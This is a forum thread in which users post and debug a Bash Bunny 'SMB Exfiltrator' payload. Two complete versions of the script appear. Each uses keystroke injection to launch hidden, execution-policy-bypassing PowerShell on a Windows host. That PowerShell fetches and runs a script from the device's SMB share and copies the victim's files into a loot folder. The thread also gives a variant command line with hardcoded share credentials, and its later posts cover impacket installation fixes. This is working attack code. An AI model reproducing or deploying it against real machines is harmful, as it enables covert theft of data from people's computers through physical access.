jblk01 Posted June 18, 2019 Share Posted June 18, 2019 Was having the blinking blue LED issue like a few other commenters, decided to fsck around and see what's what. Fixed it and added SMBv2 support to the script, with no changes made to the PowerShell script (s.ps1). @Darren Kitchen any chance these changes can be reflected on the official Github repo? #!/bin/bash # LED STATUS # ========== # FAIL........Failed to find dependencies # STAGE2......Ethernet Stage # SETUP.......HID Stage # SPECIAL.....Receiving Files # CLEANUP.....Moving Liberated Files # FINISH......Finished # # OPTIONS # ======= # Exfiltration options configured from included s.ps1 script ######## INITIALIZATION ######## REQUIRETOOL impacket GET SWITCH_POSITION # Make temporary loot directory mkdir -p /loot/smb/ # Delete any old exfiltration data rm -rf /loot/smb/* # Copy new powershell payload to smb share cp /root/udisk/payloads/$SWITCH_POSITION/s.ps1 /loot/smb/ # Make loot directory on USB Disk mkdir -p /root/udisk/loot/smb_exfiltrator ######## ETHERNET STAGE ######## LED STAGE2 ATTACKMODE RNDIS_ETHERNET # Start the SMB Server python /tools/impacket/examples/smbserver.py -smb2support -comment '1337' s /loot/smb >> /loot/smbserver.log & # Re-enable ICMP/echo replies to trip the powershell stager echo "0" > /proc/sys/net/ipv4/icmp_echo_ignore_all ######## HID STAGE ######## # Runs hidden powershell which executes \\172.16.64.1\s\s.ps1 when available GET HOST_IP LED SETUP ATTACKMODE HID RNDIS_ETHERNET RUN WIN "powershell -WindowStyle Hidden -Exec Bypass \"While (\$true) { If ((New-Object net.sockets.tcpclient ($HOST_IP,445)).Connected) { \\\\$HOST_IP\\s\\s.ps1; exit } }\"" LED B 100 # Wait until files are done copying. while ! [ -f /loot/smb/EXFILTRATION_COMPLETE ]; do sleep 1; done ######## CLEANUP ######## LED CLEANUP # Delete EXFILTRATION_COMPLETE file rm -rf /loot/smb/EXFILTRATION_COMPLETE # Move files to udisk loot directory mv /loot/smb/e/* /root/udisk/loot/smb_exfiltrator # Clean up temporary loot directory rm -rf /loot/smb/e/* # Sync file system sync ######## FINISH ######## # Trap is clean LED FINISH Link to comment Share on other sites More sharing options...
Foxtrot Posted June 28, 2019 Share Posted June 28, 2019 Hi, Is there a PR on GitHub open for this? Link to comment Share on other sites More sharing options...
joeservo Posted June 12, 2021 Share Posted June 12, 2021 the above didnt work for me, windows 10. i had to edit this line and pass the username and password RUN WIN "powershell -WindowStyle Hidden -Exec Bypass \"While (\$true) { If ((New-Object net.sockets.tcpclient ($HOST_IP,445)).Connected) {NET USE \\172.16.64.1\IPC$ /u:root hak5bunny; \\\\$HOST_IP\\s\\s.ps1; exit;}; sleep 1; }\"" specifically this part: NET USE \\172.16.64.1\IPC$ /u:root hak5bunny; Link to comment Share on other sites More sharing options...
jblk01 Posted July 4, 2021 Author Share Posted July 4, 2021 Hey @joeservo, sorry that I'm late. I realized that I partially rewrote the script and didn't share it here, I apologize for that. Here it is for both you and others if need be: #!/bin/bash # # Title: Faster SMB Exfiltrator version 2.0 # Author: Hak5Darren # Props: ImNatho, mike111b, madbuda, jblk01 # Version: 1.6.1 # Category: Exfiltration # Target: Windows XP SP3+ (Powershell) # Attackmodes: HID, Ethernet # # REQUIREMENTS # ============ # SETUP: # # 1. apt update ; apt install gcc # 2. pip install impacket # 3. cd /tools/ # 4. wget https://github.com/SecureAuthCorp/impacket/releases/download/impacket_0_9_19/impacket-0.9.19.tar.gz # 5. tar -xzvf impacket-0.9.19.tar.gz ; mv -v impacket-0.9.19/ impacket/ # # # LED STATUS # ========== # FAIL........Failed to find dependencies # STAGE1......Ethernet Stage # STAGE2......HID Stage # SPECIAL.....Receiving Files # CLEANUP.....Moving Liberated Files # FINISH......Finished # # OPTIONS # ======= # Exfiltration options configured from included s.ps1 script ######## INITIALIZATION ######## REQUIRETOOL impacket GET SWITCH_POSITION # Make temporary loot directory mkdir -p /loot/smb/ # Delete any old exfiltration data rm -rf /loot/smb/* # Copy new powershell payload to smb share cp /root/udisk/payloads/$SWITCH_POSITION/s.ps1 /loot/smb/ # Make loot directory on USB Disk mkdir -p /root/udisk/loot/smb_exfiltrator ######## ETHERNET STAGE ######## LED STAGE1 ATTACKMODE RNDIS_ETHERNET # Start the SMB Server python /tools/impacket/examples/smbserver.py -username user -password Password01 -smb2support -comment '1337' s /loot/smb >> /loot/smbserver.log & ######## HID STAGE ######## # Runs hidden powershell which executes \\172.16.64.1\s\s.ps1 GET HOST_IP LED STAGE2 ATTACKMODE HID RNDIS_ETHERNET RUN WIN powershell Q DELAY 1000 Q STRING powershell -windowstyle hidden -exec bypass "net use \\\\$HOST_IP\\s /u:user Password01; powershell -windowstyle hidden -exec bypass \\\\$HOST_IP\\s\\s.ps1; exit" Q DELAY 500 Q ENTER LED SPECIAL # Wait until files are done copying while ! [ -f /loot/smb/EXFILTRATION_COMPLETE ]; do sleep 1; done ######## CLEANUP ######## LED CLEANUP # Delete EXFILTRATION_COMPLETE file rm -rf /loot/smb/EXFILTRATION_COMPLETE # Move files to udisk loot directory mv /loot/smb/e/* /root/udisk/loot/smb_exfiltrator # Clean up temporary loot directory rm -rf /loot/smb/e/* # Sync file system sync ######## FINISH ######## # Trap is clean LED FINISH Link to comment Share on other sites More sharing options...
KinderRiegel Posted July 14, 2021 Share Posted July 14, 2021 Hello, @jblk01 it didnt work for me in Windows10 The LED ist blinking Blue and these for hours.. I got this in run powershell -WindowStyle Hidden -Exec Bypass "While ($true) { If ((New-Object net.sockets.tcpclient (172.16.64.1,445)).Connected) { \\ Link to comment Share on other sites More sharing options...
chrizree Posted July 14, 2021 Share Posted July 14, 2021 Which version of the payload did you use? The first one posted or the rewritten one further down? The string you are referring to is part of the first post/version, but not the second (newer) one. Try the rewritten one posted on the 4th of July instead. Link to comment Share on other sites More sharing options...
KinderRiegel Posted July 21, 2021 Share Posted July 21, 2021 Yes I use this Version from the 4th of July The Blue LED is blinking and blinking and blinking... It creates the folder in loot but nothing more... I use the BashBunny Mark II. Any Ideas? Link to comment Share on other sites More sharing options...
KinderRiegel Posted July 21, 2021 Share Posted July 21, 2021 when i start the smb server manually i get this error root@bunny:~# python /tools/impacket/examples/smbserver.py -username user -password Password01 -smb2support -comment '1337' s /loot/smb >> /loot/smbserver.log & [1] 9623 root@bunny:~# usage: smbserver.py [-h] [-comment COMMENT] [-debug] [-smb2support] shareName sharePath smbserver.py: error: unrecognized arguments: -username -password s /loot/smb The Content of the smbserver.log GNU nano 2.2.6 File: smbserver.log Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies [*] Config file parsed [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 [*] Config file parsed [*] Config file parsed [*] Config file parsed Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies Link to comment Share on other sites More sharing options...
chrizree Posted July 21, 2021 Share Posted July 21, 2021 In what way did you get Impacket onto the Bunny? Downloaded from Github as per the instructions in the post from the 4th of July or installed using deb package? Your log indicates an older version (0.9.16-dev) than the payload script expects (0.9.19). Link to comment Share on other sites More sharing options...
KinderRiegel Posted July 21, 2021 Share Posted July 21, 2021 Yes i have installed using deb package. okay, thanks. I will try to install it per the instructions. Link to comment Share on other sites More sharing options...
KinderRiegel Posted July 21, 2021 Share Posted July 21, 2021 can i uninstall the 0.9.16-dev on the bashbunny? Or do I just have to copy the new version from github? after copy the new version is this the content of the smbserver.log Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies [*] Config file parsed [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 [*] Config file parsed [*] Config file parsed Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies [*] Config file parsed [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 [*] Config file parsed [*] Config file parsed But when i try to start the smb server i get this [1] 2243 root@bunny:/loot# Traceback (most recent call last): File "/tools/impacket/examples/smbserver.py", line 85, in <module> server.addCredential(options.username, 0, lmhash, nthash) AttributeError: SimpleSMBServer instance has no attribute 'addCredential' Link to comment Share on other sites More sharing options...
chrizree Posted July 21, 2021 Share Posted July 21, 2021 I'd suggest you reset the Bunny and start over fresh. Then follow the instructions to the point to get the correct and intended versions of any dependency. Link to comment Share on other sites More sharing options...
KinderRiegel Posted July 21, 2021 Share Posted July 21, 2021 Yeah i think thats the best. Thank you 🙂 Link to comment Share on other sites More sharing options...
KinderRiegel Posted July 21, 2021 Share Posted July 21, 2021 Can everyone Tell me how i get the factory reset? The introduction from bash Bunny does not Work for the bash Bunny Mark 2. Link to comment Share on other sites More sharing options...
chrizree Posted July 22, 2021 Share Posted July 22, 2021 I answered in the other thread you created Link to comment Share on other sites More sharing options...
jblk01 Posted July 23, 2021 Author Share Posted July 23, 2021 Hi @KinderRiegel, I was seeing the same error as you and i found a workaround: Make sure your internet connection is shared with the Bunny. Then on the Bunny: First, do 'timedatectl set-time' followed by the current year, month and date. Then, go into the /tools/impacket/ directory and run 'pip install -r requirements.txt'. For me, this failed on a few requirements so I had to go in and: 'pip2 install setuptools-rust' 'pip2 install cryptography' 'wget https://files.pythonhosted.org/packages/80/ee/13ca9a479a7e268a2e77edbc1ef1d8876c37f254f43272f4ce9180d888b0/pyasn1-0.4.8-py2.7.egg && easy_install *.egg' 'rm -f pyans1-0.4.8-py2.7.egg' 'wget https://files.pythonhosted.org/packages/82/e2/a0f9f5452a59bafaa3420585f22b58a8566c4717a88c139af2276bb5695d/pycryptodomex-3.10.1.tar.gz' 'tar -xzvf pycryptodomex-3.10.1.tar.gz' 'cd pycryptodomex-2.10.1 && python setup.py install' 'cd /tools/impacket/ && python setup.py install' And from there it was working properly. 🙂 Link to comment Share on other sites More sharing options...
KinderRiegel Posted July 23, 2021 Share Posted July 23, 2021 @jblk01 Thanks for it. Now it works, Amazing 🙂 Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.